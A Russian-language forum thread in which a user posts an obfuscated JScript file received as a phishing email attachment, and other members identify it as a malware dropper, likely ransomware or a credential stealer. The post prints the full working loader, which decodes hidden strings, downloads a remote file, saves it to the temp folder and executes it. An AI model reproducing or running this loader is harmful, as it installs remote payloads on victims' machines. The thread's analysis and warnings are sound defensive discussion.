08.08.2016, 12:21
|
|
Новичок на форуме
|
|
Регистрация: 08.08.2016
Сообщений: 3
|
|
|
Прислали по почте скрипт, любопытство съедает...
Уважаемые! Даже не знаю, как начать, что бы ничего не нарушить и никого не обидеть: получил по почте скрипт с названием "Документация из 1С v8.1_.5c32cb1.js" - удалить бы, но любопытство взяло верх - кто-то ведь пыхтел, сочинял - а зачем? Просмотрел - нифига не понял, хотя когда-то даже драйвер к принтеру на ассемблере написал, правда под ДОСом еще... Вы тут народ продвинутый - только глянете код - сразу скажете что этот скрипт делает (я бы конечно и сам посмотрел, запустив, но не факт, что что-то увижу  Подскажите, можно ли выложить сюда этот скрипт, учитывая его возможную деструктивную суть? Или подскажите, куда мне с этим добром (гусарам - молчать )) Спасибо заранее! Успехов в скриптописании  |
|
08.08.2016, 14:03
|
|
Профессор
|
|
Регистрация: 07.11.2013
Сообщений: 4,661
|
|
Huan, скорее всего это шифровальщик типа такого
|
|
08.08.2016, 14:59
|
|
Новичок на форуме
|
|
Регистрация: 08.08.2016
Сообщений: 3
|
|
Сообщение от Rise
|
|
Huan, скорее всего это шифровальщик типа такого
|
Спасибо за ответ. Но по ссылке у меня аваст ругается на текстовый файл даже, а на этот скрипт - нет и внутри ну него ничего подозрительного, он коротенький, мож глянете? Извините за назойливость.
function WtjUwAu(yAB, YtxOanK) {
var ovBT = "c";
/// e3d6bd0381d5d5d73f3961fcd702adbd
var nGwvUpjt = "A" + "t";
var ECONGxh = ovBT + "ha";
var kXtMxZpl = new Array(ECONGxh + "r" + nGwvUpjt);
var EGLx = yAB[kXtMxZpl[0]](YtxOanK);
return EGLx;
}
function lBGKLO(NfC, ooV) {
var ZecuYrD = "c";
var aiUPW = "A";
var mdywbS = "o";
var yRyK = [ZecuYrD + "h" + "a"];
var drNB = ["r" + "C" + mdywbS + "d"];
var MFZgEqKV = ["e" + aiUPW + "t"];
var SPgOq = yRyK[0] + drNB[0] + MFZgEqKV[0];
var SOPTG = NfC[SPgOq](ooV);
return SOPTG;
}
function CkoevdP() {
var sywdzAun = [];
sywdzAun[0] = "f";
sywdzAun[1] = "rom";
sywdzAun[2] = "C";
sywdzAun[3] = "ha";
sywdzAun[4] = "rCode";
var rZIq = sywdzAun[0] + sywdzAun[1] + sywdzAun[2] + sywdzAun[3] + sywdzAun[4];
/// 048d8f0663f0895e35f6bca92750ebb7
return rZIq;
}
function kboELG(Bmj, AhYZHALF) {
var mHPh = Bmj % AhYZHALF;
return mHPh;
}
function EDLN(itUwdYjj, nyPiFH) {
var IXexnxpc = itUwdYjj ^ nyPiFH;
return IXexnxpc;
}
function hnSOz(JPvWZtwg) {
var jJkCh = JPvWZtwg / 3;
return jJkCh;
}
function ujfj() {
var GHhaUjs = "gth";
var RJZerPlp = "en";
var juVxSl = "l" + RJZerPlp + GHhaUjs;
return juVxSl;
}
function Its(pMFLQEV) {
var evjpXq = pMFLQEV + 1;
return evjpXq;
}
function PvCzGD(fjxUrdCl) {
var EYdETnXN = "string";
var GNjY = "WScript.Network";
/// cbb39566750c238d9ec717b93aa3e237
var vobFIW = WScript.CreateObject(GNjY);
var BiDF = typeof vobFIW.UserDomain;
if (BiDF == EYdETnXN) {
var MUBdRf = ujfj();
var VKVi = [''][0];
var IoovymY = 0;
var BZAkWDLe = 'lOLohlEtKsN';
var rISm = BZAkWDLe[MUBdRf];
var VdpX = 0;
var ZShHBwWX = "";
var jWPKWpUS = fjxUrdCl[MUBdRf];
}
while (VdpX < jWPKWpUS - 2) {
var FXZWFRiP = [0][0];
var meLkdDs = Its(VdpX);
var fOHcJQY = WtjUwAu(fjxUrdCl, meLkdDs);
var AVOuNH = WtjUwAu(fjxUrdCl, VdpX + 2);
var LHXq = WtjUwAu(fjxUrdCl, VdpX);
ZShHBwWX = LHXq + fOHcJQY + AVOuNH;
var gfmskX = WtjUwAu(fjxUrdCl, VdpX);
var nBVYGK = WtjUwAu(fjxUrdCl, VdpX + 1);
var DlCBnySL102 = (nBVYGK == 0);
if (gfmskX == FXZWFRiP) {
var sqpsbWp = VdpX + 1;
var uwyHO = VdpX + 2;
var EsWgnVM = WtjUwAu(fjxUrdCl, uwyHO);
ZShHBwWX = WtjUwAu(fjxUrdCl, sqpsbWp) + EsWgnVM;
}
var BvrYdkVF = WtjUwAu(fjxUrdCl, VdpX);
var DlCBnySL101 = (BvrYdkVF == 0);
if (DlCBnySL101 && DlCBnySL102) {
var rOegxJ = VdpX + 2;
ZShHBwWX = WtjUwAu(fjxUrdCl, rOegxJ);
}
IoovymY = parseInt(ZShHBwWX);
var tPMoCL = hnSOz(VdpX);
var XcOanJGe = kboELG(tPMoCL, rISm);
var DlCBnySL = lBGKLO(BZAkWDLe, XcOanJGe);
IoovymY = EDLN(IoovymY, DlCBnySL);
var GQWezvxp = CkoevdP();
var MSTC = String;
VKVi = VKVi + MSTC[GQWezvxp](IoovymY);
/// 2d5352e9b030dcb4240f2afa6bd216d0
var WrQjawnX = 3;
VdpX = VdpX + WrQjawnX;
}
return VKVi;
/// b37cb511fe88bd9154caec59cd26cf9e
}
function gGI() {
var hEOIbc = PvCzGD("004059056031082067106007039022043028060057001070030048091116000");
return hEOIbc;
}
function taYc() {
var YavcDw = PvCzGD("059028047029001028049");
var UaNsk = eval(YavcDw);
return UaNsk;
}
function YhNq() {
var iPUWwpJl = PvCzGD("033028020034036094107044006063006056027028");
return iPUWwpJl;
}
/// b1807332aea2be5bd1d227556ef0b5f7
function YAqBwo(rtwjdld, kdkndmd) {}
function XXVdDap(str) {
str[PvCzGD("047035035028013")]();
}
function Evxk(rety, serq) {
var NIFrxo = PvCzGD("015034040065013020032084100016110") + rety;
serq[PvCzGD("030058034")](NIFrxo, 0);
}
function PEd() {
var ANrAi = PvCzGD("024038058010048035039030046");
var dELYE = eval("Ac" + ANrAi + "ct");
return dELYE;
/// 8d8900cff3fbf23aa17c0b2058a4fb70
}
function GuMOid() {
var rPpzEk = PEd();
var bAemYS = PvCzGD("059028047029001028049090024027043000035");
var EjsSCSFT = new rPpzEk(bAemYS);
var Ooxsa = taYc();
var XzMMPm = YhNq();
var ZHtAM = Ooxsa[PvCzGD("063044062006024024003001039031000013034041")];
if (ZHtAM[PvCzGD("000042034008028004")] > 2) {
var yEBdOUV = gGI();
var MBkgp = new rPpzEk(XzMMPm);
var DIyZGX = PvCzGD("045011003043042066022000057022047001");
var tMXKMFe = PvCzGD("043010024");
MBkgp[PvCzGD("003063041001")](tMXKMFe, yEBdOUV, 0);
var sJLWl = PvCzGD("031042034011");
MBkgp[sJLWl]();
var LfKbSlm = PvCzGD("063044062006024024044026044093008005035041060017031049017038060044006042047027");
var BLBkkAQi = new rPpzEk(LfKbSlm);
}
if (MBkgp[PvCzGD("063059045027029031")] == 200) {
var jVkUH = new rPpzEk(DIyZGX);
var YUiIGfTu = BLBkkAQi[PvCzGD("043042056059013001053058042030043")]();
var YfSQqePS = '\\';
var rcaSSiec = YfSQqePS + YUiIGfTu;
var preBLBkkAQi = PvCzGD("043042056060024009038029042031008003035040010026");
var GoDmtxHk = BLBkkAQi[preBLBkkAQi](2) + rcaSSiec;
jVkUH[PvCzGD("035063041001")]();
var Ncmdhc = PvCzGD("056054060010");
jVkUH[Ncmdhc] = 1;
var YtYYlRhq = PvCzGD("062042063031007002054017009028042021");
var lFQXLMEa = MBkgp[YtYYlRhq];
var RtMzE = PvCzGD("059061037027013");
jVkUH[RtMzE](lFQXLMEa);
var mGvq = PvCzGD("060032063006028005042026");
jVkUH[mGvq] = 0;
var ymMRlLd = PvCzGD("063046058010060003003029039022");
jVkUH[ymMRlLd](GoDmtxHk);
XXVdDap(jVkUH);
Evxk(GoDmtxHk, EjsSCSFT);
}
/// c839745f2e160c4ba7f34fd438dd7356
YAqBwo(BLBkkAQi, ZHtAM);
}
GuMOid();
|
|
08.08.2016, 17:27
|
|
Профессор
|
|
Регистрация: 14.01.2015
Сообщений: 12,990
|
|
|
Сообщение от Huan
|
|
внутри ну него ничего подозрительного
|
Он упакован, а вот при запуске, когда будет распакован, то 99% гарантии, что содержит червяка. |
|
09.08.2016, 00:56
|
|
Профессор
|
|
Регистрация: 07.11.2013
Сообщений: 4,661
|
|
Huan,
|
Цитата:
|
|
...may steal account user names and passwords stored in your browser if you are using Chrome, Firefox, Internet Explorer, or Opera. It also attempts to steal stored account information, such as server names, port numbers, login IDs, and passwords from the following FTP clients or cloud storage programs, if these are installed... отсюда
|
Последний раз редактировалось Rise, 13.09.2016 в 12:19.
|
|
09.08.2016, 09:23
|
|
Новичок на форуме
|
|
Регистрация: 08.08.2016
Сообщений: 3
|
|
Большое спасибо, Rise & laimas!
Немного неприятно, что просто ваааще ничего не понимаю в коде скрипта, грустно, что он еще и упакован и что уже со всем этим ничего не поделать... Хотя, кто его знает, выйду на следующий год на пенсию - чем заниматься? )) Успехов, парни! |
|
13.09.2016, 03:50
|
|
Профессор
|
|
Регистрация: 04.03.2015
Сообщений: 163
|
|
|
Подскажите, как можно упаковать и\или распаковать любой скрипт так как тут?
|
|
13.09.2016, 12:12
|
|
Профессор
|
|
Регистрация: 07.11.2013
Сообщений: 4,661
|
|
|
psiklop, готовых для тебя решений нет, иначе бы не было смысла в них...
|
|
23.09.2016, 09:28
|
|
Кандидат Javascript-наук
|
|
Регистрация: 22.09.2009
Сообщений: 122
|
|
|
Существует вирус-шифровальщик на JS как раз нацеленный на бухгалтерские документы.....
Вычитал это из инета, так как вчера товарищ впустил к себе DA_VINCHI_CODE...., ну очень неприятная вещь...
|
|
10.10.2016, 20:29
|
|
Профессор
|
|
Регистрация: 04.03.2015
Сообщений: 163
|
|
|
мне недавно на мыло пришло письмецо, я бы даже не обратил внимания, но там обратный адрес был домен @sberbank.ru, вот так круто подделали и там тоже был .js типа такого
|
|
|
|
